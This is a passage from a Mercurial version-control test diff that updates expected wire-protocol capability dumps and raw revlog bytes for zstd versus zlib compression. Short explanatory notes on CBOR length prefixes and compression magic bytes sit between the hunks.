- s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa4Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogNv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
+ s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa4Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogNv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash
sending capabilities command
s> setsockopt(6, 1, 1) -> None (?)
s> POST /api/exp-http-v2-0003/ro/capabilities HTTP/1.1\r\n
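
The only difference in the three long capability dumps above is the CBOR
length prefix of the v1 capabilities payload: `Y` (0x59) introduces a
byte string with a 2-byte big-endian length, and the payload is 19 bytes
shorter under the new test configuration. The arithmetic:

    # "Y\x01\xf7" -> "Y\x01\xe4": same CBOR header, shorter payload.
    old = int.from_bytes(b'\x01\xf7', 'big')  # 503
    new = int.from_bytes(b'\x01\xe4', 'big')  # 484
    assert old - new == 19
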
--- a/tests/test-wireproto-command-rawstorefiledata.t Thu Mar 25 19:06:28 2021 -0400
+++ b/tests/test-wireproto-command-rawstorefiledata.t Tue Apr 20 11:01:06 2021 -0400
@@ -56,14 +56,17 @@
response: gen[
{
b'filecount': 1,
- b'totalsize': 527
+ b'totalsize': 527 (no-zstd !)
+ b'totalsize': 530 (zstd !)
},
{
b'location': b'store',
b'path': b'00changelog.i',
- b'size': 527
+ b'size': 527 (no-zstd !)
+ b'size': 530 (zstd !)
},
- b'\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00?\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff3\x90\xef\x85\x00s\xfb\xc2\xf0\xdf\xff"D4,\x8e\x92)\x01:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u992f4779029a3df8d0666d00bb924f69634e2641\ntest\n0 0\na\nb\n\ncommit 0\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00>\x00\x00\x00=\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xffD2\xd86&\xe8\xa9\x86U\xf0b\xec\x1f*C\xb0\x7f\x7f\xbb\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ua988fb43583e871d1ed5750ee074c6d840bbbfc8\ntest\n0 0\na\n\ncommit 1\x00\x00\x00\x00\x00~\x00\x00\x00\x00\x00N\x00\x00\x00W\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xa4r\xd2\xea\x96U\x1a\x1e\xbb\x011-\xb2\xe6\xa7\x86\xd0F\x96o\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xc5\xc1\t\xc0 \x0c\x05\xd0{\xa6p\x03cjI\xd71\xf9\x11<H\xa1u\x7fJ\xf1]\x9eyu\x98\xa2\xb0Z\x88jk0\x11\x95z\xa0\xdb\x11\\\x81S\xfc*\xb4\xe2]\xc4\x89\t\xe3\xe1\xec;\xfc\x95\x1c\xbbN\xe4\xf7\x9cc%\xf9\x00S#\x19\x13\x00\x00\x00\x00\x00\xcc\x00\x00\x00\x00\x00C\x00\x00\x00B\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x85kg{\x94a\x12i\xc5lW5[\x85\xf9\x95|\xfc\xc1\xb9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u90231ddca36fa178a0eed99bd03078112487dda3\ntest\n0 0\ndir1/f\n\ncommit 3',
+ b'\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00?\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff3\x90\xef\x85\x00s\xfb\xc2\xf0\xdf\xff"D4,\x8e\x92)\x01:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u992f4779029a3df8d0666d00bb924f69634e2641\ntest\n0 0\na\nb\n\ncommit 0\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00>\x00\x00\x00=\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xffD2\xd86&\xe8\xa9\x86U\xf0b\xec\x1f*C\xb0\x7f\x7f\xbb\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ua988fb43583e871d1ed5750ee074c6d840bbbfc8\ntest\n0 0\na\n\ncommit 1\x00\x00\x00\x00\x00~\x00\x00\x00\x00\x00N\x00\x00\x00W\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xa4r\xd2\xea\x96U\x1a\x1e\xbb\x011-\xb2\xe6\xa7\x86\xd0F\x96o\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xc5\xc1\t\xc0 \x0c\x05\xd0{\xa6p\x03cjI\xd71\xf9\x11<H\xa1u\x7fJ\xf1]\x9eyu\x98\xa2\xb0Z\x88jk0\x11\x95z\xa0\xdb\x11\\\x81S\xfc*\xb4\xe2]\xc4\x89\t\xe3\xe1\xec;\xfc\x95\x1c\xbbN\xe4\xf7\x9cc%\xf9\x00S#\x19\x13\x00\x00\x00\x00\x00\xcc\x00\x00\x00\x00\x00C\x00\x00\x00B\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x85kg{\x94a\x12i\xc5lW5[\x85\xf9\x95|\xfc\xc1\xb9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u90231ddca36fa178a0eed99bd03078112487dda3\ntest\n0 0\ndir1/f\n\ncommit 3', (no-zstd !)
+ b'\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00?\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff3\x90\xef\x85\x00s\xfb\xc2\xf0\xdf\xff"D4,\x8e\x92)\x01:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u992f4779029a3df8d0666d00bb924f69634e2641\ntest\n0 0\na\nb\n\ncommit 0\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00>\x00\x00\x00=\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xffD2\xd86&\xe8\xa9\x86U\xf0b\xec\x1f*C\xb0\x7f\x7f\xbb\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ua988fb43583e871d1ed5750ee074c6d840bbbfc8\ntest\n0 0\na\n\ncommit 1\x00\x00\x00\x00\x00~\x00\x00\x00\x00\x00Q\x00\x00\x00W\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xa4r\xd2\xea\x96U\x1a\x1e\xbb\x011-\xb2\xe6\xa7\x86\xd0F\x96o\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\xb5/\xfd WE\x02\x00r\x04\x0f\x14\x90\x01\x0e#\xf7h$;NQC%\xf8f\xd7\xb1\x81\x8d+\x01\x16+)5\xa8\x19\xdaA\xae\xe3\x00\xe9v\xe2l\x05v\x19\x11\xd4\xc1onK\xa2\x17c\xb4\xf3\xe7 z\x13\x8f\x1c\xf3j4\x03\x03\x00`\x06\x84\x8b\x1a\n\x14\x00\x00\x00\x00\x00\xcf\x00\x00\x00\x00\x00C\x00\x00\x00B\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x85kg{\x94a\x12i\xc5lW5[\x85\xf9\x95|\xfc\xc1\xb9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u90231ddca36fa178a0eed99bd03078112487dda3\ntest\n0 0\ndir1/f\n\ncommit 3', (zstd !)
b''
]
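
The paired `(no-zstd !)` / `(zstd !)` blobs above and below differ only
in how the large changelog entry is compressed, which is visible in the
raw bytes: `x\x9c` is the standard zlib header, while `(\xb5/\xfd` is the
zstd frame magic 0xFD2FB528 stored little-endian (hence the slightly
different sizes, e.g. 527 vs 530 bytes):

    # zlib default-compression header vs. zstd frame magic:
    assert b'x\x9c' == bytes([0x78, 0x9c])
    assert b'(\xb5/\xfd' == (0xFD2FB528).to_bytes(4, 'little')
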
@@ -78,14 +81,17 @@
response: gen[
{
b'filecount': 1,
- b'totalsize': 584
+ b'totalsize': 584 (no-zstd !)
+ b'totalsize': 588 (zstd !)
},
{
b'location': b'store',
b'path': b'00manifest.i',
- b'size': 584
+ b'size': 584 (no-zstd !)
+ b'size': 588 (zstd !)
},
- b'\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00I\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x99/Gy\x02\x9a=\xf8\xd0fm\x00\xbb\x92OicN&A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c\r\xca\xc1\x11\x00!\x08\x040\xdfV\x03+\xa2\x94\xb3\x8c\xd0\x7f\twy\x87\x03i\x95r\x96F6\xe5\x1c\x9a\x10-\x16\xba|\x07\xab\xe5\xd1\xf08s\\\x8d\xc2\xbeo)w\xa9\x8b;\xa2\xff\x95\x19\x02jB\xab\x0c\xea\xf3\x03\xcf\x1d\x16\t\x00\x00\x00\x00\x00I\x00\x00\x00\x00\x007\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\xa9\x88\xfbCX>\x87\x1d\x1e\xd5u\x0e\xe0t\xc6\xd8@\xbb\xbf\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+\x00\x00\x00+a\x009a38122997b3ac97be2a9aa2e556838341fdf2cc\n\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x8c\x00\x00\x01\x16\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xbcL\xdb}\x10{\xe2w\xaa\xdb"rC\xdf\xb3\xe0M\xd5,\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xcd\xb9\rB1\x10\x00Q\xc7\xbf\x19\xf6\xb6\xdd\x08\xb9\xf7\x92H\xa9\x90\xd2\xb8\x82\xc9\x9e4c\x8c\xfb\xf8\xf7\xca\xc7\x13n16\x8a\x88\xb2\xd8\x818`\xb4=eF\xb9f\x17\xcc\x92\x94hR\xc0\xeb\xe7s(/\x02\xcb\xd8\x13K\tU m\t\x1f\xef\xb2D\x03\xa6\xb6\x14\xb2\xaf\xc7[\rw?\x16`\xce\xd0"\x9c,\xddK\xd0c/\rIX4\xc3\xbc\xe4\xef{ u\xcc\x8c\x9c\x93]\x0f\x9cM;\n\xb7\x12-X\x1c\x96\x9fuT\xc8\xf5\x06\x88\xa25W\x00\x00\x00\x00\x01\x0c\x00\x00\x00\x00\x00<\x00\x00\x01\x16\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x90#\x1d\xdc\xa3o\xa1x\xa0\xee\xd9\x9b\xd00x\x11$\x87\xdd\xa3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe6\x00\x00\x01\x16\x00\x00\x000dir1/f\x0028c776ae08d0d55eb40648b401b90ff54448348e\n',
+ b'\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00I\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x99/Gy\x02\x9a=\xf8\xd0fm\x00\xbb\x92OicN&A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c\r\xca\xc1\x11\x00!\x08\x040\xdfV\x03+\xa2\x94\xb3\x8c\xd0\x7f\twy\x87\x03i\x95r\x96F6\xe5\x1c\x9a\x10-\x16\xba|\x07\xab\xe5\xd1\xf08s\\\x8d\xc2\xbeo)w\xa9\x8b;\xa2\xff\x95\x19\x02jB\xab\x0c\xea\xf3\x03\xcf\x1d\x16\t\x00\x00\x00\x00\x00I\x00\x00\x00\x00\x007\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\xa9\x88\xfbCX>\x87\x1d\x1e\xd5u\x0e\xe0t\xc6\xd8@\xbb\xbf\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+\x00\x00\x00+a\x009a38122997b3ac97be2a9aa2e556838341fdf2cc\n\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x8c\x00\x00\x01\x16\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xbcL\xdb}\x10{\xe2w\xaa\xdb"rC\xdf\xb3\xe0M\xd5,\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xcd\xb9\rB1\x10\x00Q\xc7\xbf\x19\xf6\xb6\xdd\x08\xb9\xf7\x92H\xa9\x90\xd2\xb8\x82\xc9\x9e4c\x8c\xfb\xf8\xf7\xca\xc7\x13n16\x8a\x88\xb2\xd8\x818`\xb4=eF\xb9f\x17\xcc\x92\x94hR\xc0\xeb\xe7s(/\x02\xcb\xd8\x13K\tU m\t\x1f\xef\xb2D\x03\xa6\xb6\x14\xb2\xaf\xc7[\rw?\x16`\xce\xd0"\x9c,\xddK\xd0c/\rIX4\xc3\xbc\xe4\xef{ u\xcc\x8c\x9c\x93]\x0f\x9cM;\n\xb7\x12-X\x1c\x96\x9fuT\xc8\xf5\x06\x88\xa25W\x00\x00\x00\x00\x01\x0c\x00\x00\x00\x00\x00<\x00\x00\x01\x16\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x90#\x1d\xdc\xa3o\xa1x\xa0\xee\xd9\x9b\xd00x\x11$\x87\xdd\xa3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe6\x00\x00\x01\x16\x00\x00\x000dir1/f\x0028c776ae08d0d55eb40648b401b90ff54448348e\n', (no-zstd !)
+ b'\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00H\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x99/Gy\x02\x9a=\xf8\xd0fm\x00\xbb\x92OicN&A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\xb5/\xfd V\xfd\x01\x00b\xc5\x0e\x0f\xc0\xd1\x00\xfb\x0c\xb9\xca\xdf\xb2R\xba!\xf2\xf6\x1d\x80\xd5\x95Yc\xef9DaT\xcefcM\xf1\x12\t\x84\xf3\x1a\x04\x04N\\\'S\xf2\'\x8cz5\xc5\x9f\xfa\x18\xf3\x82W\x1a\x83Y\xe8\xf0\x00\x00\x00\x00\x00\x00H\x00\x00\x00\x00\x007\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\xa9\x88\xfbCX>\x87\x1d\x1e\xd5u\x0e\xe0t\xc6\xd8@\xbb\xbf\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+\x00\x00\x00+a\x009a38122997b3ac97be2a9aa2e556838341fdf2cc\n\x00\x00\x00\x00\x00\x7f\x00\x00\x00\x00\x00\x91\x00\x00\x01\x16\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xbcL\xdb}\x10{\xe2w\xaa\xdb"rC\xdf\xb3\xe0M\xd5,\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\xb5/\xfd \xccE\x04\x00bK\x1e\x17\xb0A0\xff\xff\x9b\xb5V\x99\x99\xfa\xb6\xae\xf5n),"\xf1\n\x02\xb5\x07\x82++\xd1]T\x1b3\xaa\x8e\x10+)R\xa6\\\x9a\x10\xab+\xb4\x8bB\x9f\x13U\xd4\x98\xbd\xde \x9a\xf4\xd1}[\xfb{,q\x14Kf\x06\x1e\x10\xd6\x17\xbbl\x90\x16\xb9\xb3\xd8\x07\xee\xfc\xa8\x8eI\x10]\x9c\x1ava\x054W\xad\xdf\xb3\x18\xee\xbdd\x15\xdf$\x85St\n\xde\xee?\x91\xa0\x83\x11\x08\xd8\x01\x80\x10B\x04\x00\x04S\x04B\xc7Tw\x9f\xb9,\x00\x00\x00\x00\x01\x10\x00\x00\x00\x00\x00<\x00\x00\x01\x16\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x90#\x1d\xdc\xa3o\xa1x\xa0\xee\xd9\x9b\xd00x\x11$\x87\xdd\xa3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe6\x00\x00\x01\x16\x00\x00\x000dir1/f\x0028c776ae08d0d55eb40648b401b90ff54448348e\n', (zstd !)
b''
]
@@ -100,21 +106,26 @@
response: gen[
{
b'filecount': 2,
- b'totalsize': 1111
+ b'totalsize': 1111 (no-zstd !)
+ b'totalsize': 1118 (zstd !)
},
{
b'location': b'store',
b'path': b'00manifest.i',
- b'size': 584
+ b'size': 584 (no-zstd !)
+ b'size': 588 (zstd !)
},
- b'\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00I\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x99/Gy\x02\x9a=\xf8\xd0fm\x00\xbb\x92OicN&A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c\r\xca\xc1\x11\x00!\x08\x040\xdfV\x03+\xa2\x94\xb3\x8c\xd0\x7f\twy\x87\x03i\x95r\x96F6\xe5\x1c\x9a\x10-\x16\xba|\x07\xab\xe5\xd1\xf08s\\\x8d\xc2\xbeo)w\xa9\x8b;\xa2\xff\x95\x19\x02jB\xab\x0c\xea\xf3\x03\xcf\x1d\x16\t\x00\x00\x00\x00\x00I\x00\x00\x00\x00\x007\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\xa9\x88\xfbCX>\x87\x1d\x1e\xd5u\x0e\xe0t\xc6\xd8@\xbb\xbf\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+\x00\x00\x00+a\x009a38122997b3ac97be2a9aa2e556838341fdf2cc\n\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x8c\x00\x00\x01\x16\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xbcL\xdb}\x10{\xe2w\xaa\xdb"rC\xdf\xb3\xe0M\xd5,\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xcd\xb9\rB1\x10\x00Q\xc7\xbf\x19\xf6\xb6\xdd\x08\xb9\xf7\x92H\xa9\x90\xd2\xb8\x82\xc9\x9e4c\x8c\xfb\xf8\xf7\xca\xc7\x13n16\x8a\x88\xb2\xd8\x818`\xb4=eF\xb9f\x17\xcc\x92\x94hR\xc0\xeb\xe7s(/\x02\xcb\xd8\x13K\tU m\t\x1f\xef\xb2D\x03\xa6\xb6\x14\xb2\xaf\xc7[\rw?\x16`\xce\xd0"\x9c,\xddK\xd0c/\rIX4\xc3\xbc\xe4\xef{ u\xcc\x8c\x9c\x93]\x0f\x9cM;\n\xb7\x12-X\x1c\x96\x9fuT\xc8\xf5\x06\x88\xa25W\x00\x00\x00\x00\x01\x0c\x00\x00\x00\x00\x00<\x00\x00\x01\x16\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x90#\x1d\xdc\xa3o\xa1x\xa0\xee\xd9\x9b\xd00x\x11$\x87\xdd\xa3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe6\x00\x00\x01\x16\x00\x00\x000dir1/f\x0028c776ae08d0d55eb40648b401b90ff54448348e\n',
+ b'\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00I\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x99/Gy\x02\x9a=\xf8\xd0fm\x00\xbb\x92OicN&A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c\r\xca\xc1\x11\x00!\x08\x040\xdfV\x03+\xa2\x94\xb3\x8c\xd0\x7f\twy\x87\x03i\x95r\x96F6\xe5\x1c\x9a\x10-\x16\xba|\x07\xab\xe5\xd1\xf08s\\\x8d\xc2\xbeo)w\xa9\x8b;\xa2\xff\x95\x19\x02jB\xab\x0c\xea\xf3\x03\xcf\x1d\x16\t\x00\x00\x00\x00\x00I\x00\x00\x00\x00\x007\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\xa9\x88\xfbCX>\x87\x1d\x1e\xd5u\x0e\xe0t\xc6\xd8@\xbb\xbf\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+\x00\x00\x00+a\x009a38122997b3ac97be2a9aa2e556838341fdf2cc\n\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x8c\x00\x00\x01\x16\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xbcL\xdb}\x10{\xe2w\xaa\xdb"rC\xdf\xb3\xe0M\xd5,\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xcd\xb9\rB1\x10\x00Q\xc7\xbf\x19\xf6\xb6\xdd\x08\xb9\xf7\x92H\xa9\x90\xd2\xb8\x82\xc9\x9e4c\x8c\xfb\xf8\xf7\xca\xc7\x13n16\x8a\x88\xb2\xd8\x818`\xb4=eF\xb9f\x17\xcc\x92\x94hR\xc0\xeb\xe7s(/\x02\xcb\xd8\x13K\tU m\t\x1f\xef\xb2D\x03\xa6\xb6\x14\xb2\xaf\xc7[\rw?\x16`\xce\xd0"\x9c,\xddK\xd0c/\rIX4\xc3\xbc\xe4\xef{ u\xcc\x8c\x9c\x93]\x0f\x9cM;\n\xb7\x12-X\x1c\x96\x9fuT\xc8\xf5\x06\x88\xa25W\x00\x00\x00\x00\x01\x0c\x00\x00\x00\x00\x00<\x00\x00\x01\x16\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x90#\x1d\xdc\xa3o\xa1x\xa0\xee\xd9\x9b\xd00x\x11$\x87\xdd\xa3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe6\x00\x00\x01\x16\x00\x00\x000dir1/f\x0028c776ae08d0d55eb40648b401b90ff54448348e\n', (no-zstd !)
